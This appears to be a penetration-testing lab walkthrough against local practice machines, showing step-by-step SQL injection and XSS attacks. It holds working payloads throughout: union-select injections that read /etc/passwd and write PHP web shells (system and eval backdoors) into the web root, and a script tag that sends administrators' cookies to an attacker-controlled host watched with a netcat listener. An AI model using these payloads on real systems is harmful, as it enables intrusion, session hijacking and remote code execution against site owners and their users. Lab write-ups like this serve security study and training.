SQLi
Discover possible injection points
Attempt to verify injection
according to
http://192.168.35.128/cat.php?id=1' or 1=1%23 An error is found, indicating that there is a non-character injection here
http://192.168.35.128/cat.php?id=1 and 1=1 display normally
http://192.168.35.128/cat.php?id=1 and 1=2 no display
Explain that there is an injection point here and it is a digital injection
http://192.168.35.128/cat.php?id=1 normally displayed when order by 4
http://192.168.35.128/cat.php?id=1 order by 5 error
Explain that there are only 4 fields in the current table
Find out what fields are displayed
There are displayed fields as 2
get database name
get table name
get field name
get data
Log in to pass the horse in the background, find that filtering php, change it to uppercase and successfully getshell
XSS (no bot can only simulate login manually)
Find possible XSS vulnerability points
Test for the existence of vulnerabilities
Alert1 pops up successfully, indicating that there is a vulnerability
Write attack code and set monitoring locally
<script>document.write('<img src="http://192.168.243.133/?'+document.cookie+' "/>');</script>
nc -lvnp 80
After the administrator logs in, the administrator's cookie information is obtained
Visit the web page with a cookie (this can be achieved with the console document.cookie="xx"), and successfully log in as an administrator
Then look for injection point
verify
and 1=1 normal display
and 1=2 no display
Indicates that there is sql injection
order by found 4 fields
Find out the display bits http://192.168.243.135/admin/edit.php?id=2%20and%201=2%20union%20select%201,2,3,4
found that 2 and 3 are display bits
read passwd http://192.168.243.135/admin/edit.php?id=2%20and%201=2%20union%20select%201,2,load_file(%22/etc/passwd%22),4
No echo when reading shadow may be due to insufficient permissions
Look for exposed directory information, try to write
http://192.168.179.130/admin/edit.php?id=0%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/classes/test.php%22
404 may be no write permission when accessing
Try another directory (there is a css directory in the source code)
Try to write again, the access found that there is an echo
ok, this directory can be used, basically you can do whatever you want
write command execution
http://192.168.243.135/admin/edit.php?id=0%20union%20select%201,2,%22%3C?php%20system($_GET[%27a%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/test.php%22
write a sentence
http://192.168.243.135/admin/edit.php?id=0%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27a%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/test4.php%22
successfully get the shell